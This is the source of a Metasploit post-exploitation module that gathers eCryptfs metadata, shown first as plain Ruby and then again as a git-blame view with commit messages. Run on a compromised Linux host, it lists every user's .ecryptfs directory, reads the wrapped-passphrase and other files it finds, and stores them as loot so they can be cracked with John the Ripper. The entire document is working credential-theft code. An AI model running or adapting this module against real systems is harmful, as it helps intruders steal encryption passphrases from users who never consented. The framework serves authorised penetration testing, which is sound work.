metasploit-framework/modules/post/linux/gather/ecryptfs_creds.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info={})
    super( update_info(info,
      'Name'           => 'Gather eCryptfs Metadata',
      'Description'    => %q{
        This module will collect the contents of all users' .ecrypts directories on
        the targeted machine. Collected "wrapped-passphrase" files can be
        cracked with John the Ripper (JtR) to recover "mount passphrases".
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['Dhiru Kholia <dhiru[at]openwall.com>'],
      'Platform'       => ['linux'],
      'SessionTypes'   => ['shell']
    ))
  end

  # This module is largely based on ssh_creds, gpg_creds and firefox_creds.rb.

  def run
    print_status("Finding .ecryptfs directories")
    paths = enum_user_directories.map {|d| d + "/.ecryptfs"}
    # Array#select! is only in 1.9
    paths = paths.select { |d| directory?(d) }

    if paths.nil? or paths.empty?
      print_error("No users found with a .ecryptfs directory")
      return
    end

    download_loot(paths)
  end

  def download_loot(paths)
    print_status("Looting #{paths.count} directories")
    paths.each do |path|
      path.chomp!
      sep = "/"
      files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)

      files.each do |file|
        target = "#{path}#{sep}#{file}"
        if directory?(target)
          next
        end
        print_status("Downloading #{path}#{sep}#{file} -> #{file}")
        data = read_file(target)
        file = file.split(sep).last
        loot_path = store_loot("ecryptfs.#{file}", "text/plain", session, data,
          nil, "eCryptfs #{file} File")
        print_good("File stored in: #{loot_path.to_s}")
      end
    end
  end
end
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Post`
Retab changes for PR #2304 2013-09-05 18:41:25 +00:00			`include Msf::Post::File`
			`include Msf::Post::Unix`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super( update_info(info,`
			`'Name' => 'Gather eCryptfs Metadata',`
			`'Description' => %q{`
			`This module will collect the contents of all users' .ecrypts directories on`
			`the targeted machine. Collected "wrapped-passphrase" files can be`
			`cracked with John the Ripper (JtR) to recover "mount passphrases".`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Dhiru Kholia <dhiru[at]openwall.com>'],`
			`'Platform' => ['linux'],`
			`'SessionTypes' => ['shell']`
			`))`
			`end`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# This module is largely based on ssh_creds, gpg_creds and firefox_creds.rb.`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`print_status("Finding .ecryptfs directories")`
			`paths = enum_user_directories.map {\|d\| d + "/.ecryptfs"}`
			`# Array#select! is only in 1.9`
			`paths = paths.select { \|d\| directory?(d) }`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if paths.nil? or paths.empty?`
			`print_error("No users found with a .ecryptfs directory")`
			`return`
			`end`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`download_loot(paths)`
			`end`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def download_loot(paths)`
			`print_status("Looting #{paths.count} directories")`
			`paths.each do \|path\|`
			`path.chomp!`
			`sep = "/"`
			`files = cmd_exec("ls -1 #{path}").split(/\r\n\|\r\|\n/)`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`files.each do \|file\|`
			`target = "#{path}#{sep}#{file}"`
			`if directory?(target)`
			`next`
			`end`
			`print_status("Downloading #{path}#{sep}#{file} -> #{file}")`
			`data = read_file(target)`
			`file = file.split(sep).last`
			`loot_path = store_loot("ecryptfs.#{file}", "text/plain", session, data,`
			`nil, "eCryptfs #{file} File")`
			`print_good("File stored in: #{loot_path.to_s}")`
			`end`
			`end`
			`end`
Land #2168 again Adding Dhiru's module back now that things are straight. 2013-07-30 03:10:25 +00:00			`end`